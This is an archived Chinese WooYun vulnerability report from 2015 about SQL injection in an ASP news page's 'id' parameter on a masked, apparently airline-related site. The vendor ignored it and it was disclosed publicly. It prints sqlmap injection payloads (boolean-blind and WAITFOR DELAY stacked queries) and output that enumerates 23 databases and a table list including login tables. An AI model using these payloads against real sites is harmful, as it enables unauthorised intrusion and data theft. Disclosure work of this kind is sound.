乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-26: 细节已通知厂商并且等待厂商处理中 2015-12-01: 厂商已经主动忽略漏洞,细节向公众公开
RT为了保持标题好看。。。。为了支持wooyun海外版http://zone.wooyun.org/content/23994
漏洞站点:
http://**.**.**.**:8089/
漏洞地址:
http://**.**.**.**:8089/about/news_articles.asp?id=46参数id可注入
23个数据库:
---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=49 AND 3726=3726 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: id=49;WAITFOR DELAY '0:0:5'-----[15:17:06] [INFO] testing Microsoft SQL Server[15:17:06] [INFO] confirming Microsoft SQL Server[15:17:06] [INFO] heuristics detected web page charset 'ascii'[15:17:07] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2005[15:17:07] [INFO] fetching current user[15:17:07] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[15:17:07] [INFO] retrieved: guestusercurrent user: 'guestuser'[15:18:11] [INFO] fetching current database[15:18:11] [INFO] retrieved: nkg_Webcurrent database: 'nkg_Web'[15:18:58] [INFO] testing if current user is DBA[15:18:59] [INFO] heuristics detected web page charset 'Big5'[15:18:59] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'current user is DBA: False[15:18:59] [INFO] fetching database names[15:18:59] [INFO] fetching number of databases[15:18:59] [INFO] retrieved: 23[15:19:17] [INFO] retrieved: cn_web[15:20:00] [INFO] retrieved: ctu_Web[15:20:37] [INFO] retrieved: hgh_Web[15:21:20] [INFO] retrieved: master[15:22:03] [INFO] retrieved: mo_web[15:23:03] [INFO] retrieved: model[15:24:12] [INFO] retrieved: msdb[15:24:32] [INFO] retrieved: nkg_Web[15:25:28] [INFO] retrieved: pek_Web[15:26:19] [INFO] retrieved: pvg_Web[15:27:07] [INFO] retrieved: ReportServer[15:28:19] [INFO] retrieved: ReportServerTempDB[15:30:09] [INFO] retrieved: s_airmacau[15:31:01] [INFO] retrieved: szx_Web[15:31:53] [INFO] retrieved: tempdb[15:32:26] [INFO] retrieved: tpe_web[15:33:21] [INFO] retrieved: tw_amh[15:34:09] [INFO] retrieved: tw_web[15:35:20] [INFO] retrieved: tw_web_event[15:37:17] [INFO] retrieved: tw_web_internal[15:39:35] [INFO] retrieved: tw_web_outstation[15:42:37] [INFO] retrieved: tw_web_telex[15:44:14] [INFO] retrieved: xmn_Webavailable databases [23]:[*] cn_web[*] ctu_Web[*] hgh_Web[*] master[*] mo_web[*] model[*] msdb[*] nkg_Web[*] pek_Web[*] pvg_Web[*] ReportServer[*] ReportServerTempDB[*] s_airmacau[*] szx_Web[*] tempdb[*] tpe_web[*] tw_amh[*] tw_web[*] tw_web_event[*] tw_web_internal[*] tw_web_outstation[*] tw_web_telex[*] xmn_Web
数据表23张
Database: nkg_Web[23 tables]+--------------------+| CityName || FileMapping || NXPress || NotesLog || aboutnews || dtproperties || iataagent || iatanewslist || iatapricelist || iatauser || login_user || newbonus || news || newsps_reporter || newsps_user || offers || vinfoOrders || vinfopackage || vinfopackagedetail || vinfopackageitems || vinfopackagereg || vinfopackagetmp || vinfouser |+--------------------+
未深入
已证明
过滤
危害等级:无影响厂商忽略
忽略时间:2015-12-01 02:51
此漏洞似乎廠商已修補,目前無法驗證
暂无